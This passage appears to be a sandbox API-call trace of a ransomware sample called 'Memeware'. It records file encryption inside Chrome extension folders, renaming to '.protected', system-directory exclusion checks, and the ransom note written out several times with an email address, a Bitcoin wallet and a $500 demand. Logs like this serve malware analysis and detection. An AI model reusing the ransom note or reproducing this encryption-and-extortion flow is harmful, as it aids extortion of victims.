hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.222] CloseHandle (hObject=0x164) returned 1 [0080.222] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected") returned 170 [0080.222] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\computed_hashes.json.protected")) returned 1 [0080.222] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Windows") returned -1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="Program Files (x86)") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="$Recycle.bin") returned 1 [0080.222] lstrcmpiW (lpString1="verified_contents.json", lpString2="System Volume Information") returned 1 [0080.222] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrIW (lpFirst="verified_contents.json", lpSrch=".protected") returned 0x0 [0080.223] lstrcmpW (lpString1="verified_contents.json", lpString2="RESTORE_FILES.txt") returned 1 [0080.223] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295db3c | out: pbBuffer=0x295db3c) returned 1 [0080.223] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295db64*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295db64*=0x30) returned 1 [0080.223] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".rar") returned 0x0 [0080.223] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json") returned 162 [0080.223] StrStrW (lpFirst="verified_contents.json", lpSrch=".zip") returned 0x0 [0080.224] ReadFile (in: hFile=0x164, lpBuffer=0xd010e0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesRead=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.235] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.235] WriteFile (in: hFile=0x164, lpBuffer=0xd010e0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xd010e0*, lpNumberOfBytesWritten=0x295db84*=0x2800, lpOverlapped=0x0) returned 1 [0080.236] SetFilePointerEx (in: hFile=0x164, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.236] WriteFile (in: hFile=0x164, lpBuffer=0x295db5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x295db5c*, lpNumberOfBytesWritten=0x295db84*=0x4, lpOverlapped=0x0) returned 1 [0080.236] WriteFile (in: hFile=0x164, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295db84*=0x30, lpOverlapped=0x0) returned 1 [0080.236] CloseHandle (hObject=0x164) returned 1 [0080.236] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected") returned 172 [0080.236] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\verified_contents.json.protected")) returned 1 [0080.237] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 0 [0080.237] FindClose (in: hFindFile=0x47bbd0 | out: hFindFile=0x47bbd0) returned 1 [0080.237] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\RESTORE_FILES.txt") returned 157 [0080.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0080.247] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.247] WriteFile (in: hFile=0x160, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295db84*=0x53d, lpOverlapped=0x0) returned 1 [0080.248] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.248] WriteFile (in: hFile=0x160, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295db84*=0x2ac, lpOverlapped=0x0) returned 1 [0080.248] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.248] WriteFile (in: hFile=0x160, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295db84, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295db84*=0xb1, lpOverlapped=0x0) returned 1 [0080.248] CloseHandle (hObject=0x160) returned 1 [0080.248] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0 [0080.248] FindClose (in: hFindFile=0x47bb90 | out: hFindFile=0x47bb90) returned 1 [0080.249] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\RESTORE_FILES.txt") returned 147 [0080.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0080.249] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.249] WriteFile (in: hFile=0x15c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ddf4*=0x53d, lpOverlapped=0x0) returned 1 [0080.250] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.250] WriteFile (in: hFile=0x15c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ddf4*=0x2ac, lpOverlapped=0x0) returned 1 [0080.250] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.250] WriteFile (in: hFile=0x15c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ddf4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ddf4*=0xb1, lpOverlapped=0x0) returned 1 [0080.250] CloseHandle (hObject=0x15c) returned 1 [0080.251] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0 [0080.251] FindClose (in: hFindFile=0x47bb50 | out: hFindFile=0x47bb50) returned 1 [0080.251] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\RESTORE_FILES.txt") returned 141 [0080.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0080.251] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.251] WriteFile (in: hFile=0x158, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e064*=0x53d, lpOverlapped=0x0) returned 1 [0080.252] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0080.252] WriteFile (in: hFile=0x158, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e064*=0x2ac, lpOverlapped=0x0) returned 1 [0080.252] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.252] WriteFile (in: hFile=0x158, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e064, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e064*=0xb1, lpOverlapped=0x0) returned 1 [0080.252] CloseHandle (hObject=0x158) returned 1 [0080.252] FindNextFileW (in: hFindFile=0x47bb10, lpFindFileData=0x295e2f0 | out: lpFindFileData=0x295e2f0) returned 1 [0080.252] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Windows") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="Program Files (x86)") returned -1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="$Recycle.bin") returned 1 [0080.253] lstrcmpiW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="System Volume Information") returned -1 [0080.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi") returned 123 [0080.253] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2=".") returned 1 [0080.253] lstrcmpW (lpString1="ghbmnnjooekpmoecnnnilnnbdlolhkhi", lpString2="..") returned 1 [0080.253] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*") returned 125 [0080.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\*", lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 0x47bb50 [0080.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.253] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.254] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\.") returned 125 [0080.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.254] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.254] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\..") returned 126 [0080.254] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.254] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.254] FindNextFileW (in: hFindFile=0x47bb50, lpFindFileData=0x295e080 | out: lpFindFileData=0x295e080) returned 1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Windows") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Program Files") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="Program Files (x86)") returned -1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="$Recycle.bin") returned 1 [0080.254] lstrcmpiW (lpString1="1.4_0", lpString2="System Volume Information") returned -1 [0080.254] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0") returned 129 [0080.254] lstrcmpW (lpString1="1.4_0", lpString2=".") returned 1 [0080.254] lstrcmpW (lpString1="1.4_0", lpString2="..") returned 1 [0080.254] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*") returned 131 [0080.254] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\*", lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 0x47bb90 [0080.276] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.276] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.276] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\.") returned 131 [0080.277] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.277] FindNextFileW (in: hFindFile=0x47bb90, lpFindFileData=0x295de10 | out: lpFindFileData=0x295de10) returned 1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.277] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.277] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.277] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\..") returned 132 [0080.277] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.277] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.277] FindNextFileW 